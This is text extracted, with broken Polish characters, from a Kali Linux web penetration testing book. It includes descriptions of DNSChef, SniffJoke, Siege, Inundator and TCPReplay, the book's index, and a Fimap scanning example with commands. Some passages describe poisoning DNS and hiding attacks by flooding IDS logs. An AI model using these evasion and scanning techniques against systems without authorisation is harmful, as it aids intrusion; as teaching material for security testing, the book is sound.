Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 30: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

